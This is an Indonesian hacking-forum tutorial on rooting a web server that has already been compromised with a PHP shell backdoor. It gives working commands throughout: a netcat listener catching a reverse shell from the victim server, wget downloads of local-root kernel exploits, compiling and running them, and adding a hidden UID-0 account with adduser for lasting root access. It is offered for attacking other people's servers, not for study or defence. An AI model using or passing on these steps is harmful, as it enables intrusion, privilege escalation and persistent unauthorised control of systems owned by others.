Cara untuk ngeroot server & menambahkan user root baru, dikemudian hari bisa digunakan lebih jauh.
Hal yang dibutuhkan adalah
- Komputer & Kopi
- Situs target yang sudah di inject “shell backdoor”
- Tool-tool Localroot Exploit
- Netcat
1 – Cari Informasi Detail Server TargetBuka shell php di website yang sebelumnya telah ter-hack & terpasang backdoor “
shell php”
Contoh:
[You must be registered and logged in to see this link.]Tampilannya akan seperti dibawah:
[You must be registered and logged in to see this image.]Langkah selanjutnya adalah pastikan anda mengetahui kernel server yang dipakai, biasanya sudah ada informasinya di “
shell backdoor” seperti contoh di atas yaitu:
Linux somerandomhosting.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686Atau anda juga bisa menggunakan dan menjalankan perintah:
[You must be registered and logged in to see this link.]Dari informasi diatas kita ketahui bahwa kernelnya adalah:
2.6.18-8 i686Nah, setelah mengetahui informasi kernel, maka langkah yang harus dilakukan adalah cari dan temukan “
LocalRoot Exploit” tool yang cocok untuk kernel diatas. Sediakan localroot untuk kernel ini:
2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686.
Kita cari disini saja localroot exploitnya, kebetulan banyak listnya:
localroot.th3-0utl4ws [You must be registered and logged in to see this link.]2 – BackConnecting Dari Server Ke Komputer AttackerSeperti yang disampaikan sebelumnya, yang dibutuhkan dalam hal ini adalah:
- Netcat Tools (Harus sudah terinstall di komputer)
- Open port (Port-port yang secara otomatis terbuka)
Buka netcat dan jalankan perintah berikut, misal port yang akan digunakan adalah
443:
C:\WINDOWS\system32\cmd.exe – nc -l -n -v -p 443Kemudian tekan “
Enter”
Nanti akan muncul pesan “
Listening on [any] 443 …”
Setelah itu, kita kembali ke “
shell backkdor” yang sudah kita tanamkan.
Cari fungsi “
Back Connect“, kemudian isikan IP yang kita miliki & port.
Misal: IP Kita:
[You must be registered and logged in to see this link.] dan port:
[You must be registered and logged in to see this link.], seperti gambar dibawah:
[You must be registered and logged in to see this link.]Kita jalankan perintah “
Connect”
Klo berhasil akan muncul seperti ini di layar command line kita, itu artinya back connect berhasil dengan sukses.
[You must be registered and logged in to see this link.] 3 – Download Exploit & Eksekusi ExploitKita
akan membutuhkan localroot exploit, bisa di download dari link yang
sudah disebutkan diatas, adapun beberapa cara yang bisa dilakukan yaitu
1) Menggunakan fungsi “
WGET / CURL”
2) Bisa menggunakan cara
upload manual dari shell
Berhubung di server ini “WGET” bisa dilakukan, maka download localroot exploit memakai fungsi “WGET”
[You must be registered and logged in to see this link.] Oke, copy saja download link “localroot exploit yang tepat:
Download Kumpulan Tools Localroot Dari Th3-0utl4ws [You must be registered and logged in to see this link.] Untuk mendownload tools diatas ketikkan saja perintah:
wget [You must be registered and logged in to see this link.]Apabila sudah terdownload maka extract “
local root tools” tersebut, bisa dengan menggunakan perintah “
unzip” atau “
untar” atau “
[You must be registered and logged in to see this link.]”
[You must be registered and logged in to see this link.]Seperti contoh diatas, “localroot exploit sudah terdownload” dan ter-extract:
unzip prct1.c.zipLangkah
selanjutnya adalah mengcompile localroot exploit tersebut, karena
menggunakan bahasa “C”, maka yang digunakan adalah perintah GCC:
gcc prct1.c -o prcKemudian jalankan:
[You must be registered and logged in to see this link.]Catatan: Jika gagal dan muncul error, sebaiknya menggunakan tools “local root” exploit yang lainnya. (
JANGAN MENYERAH!)
Yang di atas masih gagal, lakukan lagi & cari exploit lainnya!
Unzip lagi file localroot exploit yang lainnya:
unzip 2.6.18-164.zip [You must be registered and logged in to see this link.]Nah, localroot exploit diatas sangat cocok untuk kernel ini: (“
2.6.18-164“)
Karena
sudah berbentuk file yang sudah dicompile dan sudah bisa di eksekusi,
langsung saja dieksekusi & jangan lupa change permissionnya jadi
“777″, seperti contoh berikut:
chmod 777 2.6.18-164Kemudian jalankan exploit:
./2.6.18-164Untuk mengecek apakah kita sudah berhasil mendapatkan akses root, check dengan perintah berikut:
id or
whoami [You must be registered and logged in to see this link.]Jreng.. Jreng.. Jreng.. Anda sudah mendapatkan akses root, congrat!
4 – Menambahkan User Root BaruMenambahkan
user akses selevel dengan root sangatlah mudah, gunakan saja perintah
berikut, sebagai contoh kita akan menambahkan akses root dengan user “
Haxorfortutorial“:
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M HaxorfortutorialPenjelasan perintah:
Quote:
adduser – Perintah dasar linux untuk menambahkan user
-u 0 -o – set user menjadi dengan ID nol (0) root.
-g 0 – Set initial group dengan ID nol (0) root.
-G 0,1,2,3,4,6,10 – Set additional group ke:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel
-M – ‘home directory’ tidak di create ke user.
Haxorfortutorial - User name of the new user account.
Catatan: Rubah user
Haxorfortutorial sesuai dengan username yang kalian inginkan, ini hanya contoh saja
[You must be registered and logged in to see this image.]Selanjutnya, lakukan set password untuk user yang telah kita buat.
Perintahnya:
passwd
HaxorfortutorialContoh implementasi:
[root@fedora ~]# passwd
Haxorfortutorial Changing password for user
Haxorfortutorial.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
id Haxorfortutorial[You must be registered and logged in to see this link.]Backdoor GNY shell –
[You must be registered and logged in to see this link.] Tools NetCat –
[You must be registered and logged in to see this link.]Demikian tutorial singkat cara ngeroot server dengan mudah, semoga selalu berhasil ngeroot! Selesai
[You must be registered and logged in to see this link.]